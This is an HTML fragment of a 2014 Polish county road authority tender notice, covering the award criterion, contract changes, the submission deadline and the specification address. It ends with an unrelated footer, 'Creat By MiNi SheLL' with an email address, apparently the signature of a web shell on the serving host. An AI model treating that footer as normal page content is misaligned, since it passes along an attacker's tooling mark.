<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, zgodnie z warunkami podanymi we wzorze umowy, stanowiącym załącznik Nr 7 do SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip-pzd.powiat.bedzin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Zarząd Dróg w Będzinie z/s w Rogoźniku 42-582 Rogoźnik, ul. Węgroda 59  cena 200 zł.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.07.2014 godzina 10:00, miejsce: Powiatowy Zarząd Dróg w Będzinie z/s w Rogoźniku 42-582 Rogoźnik, ul. Węgroda 59 , I piętro, pok. 25.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com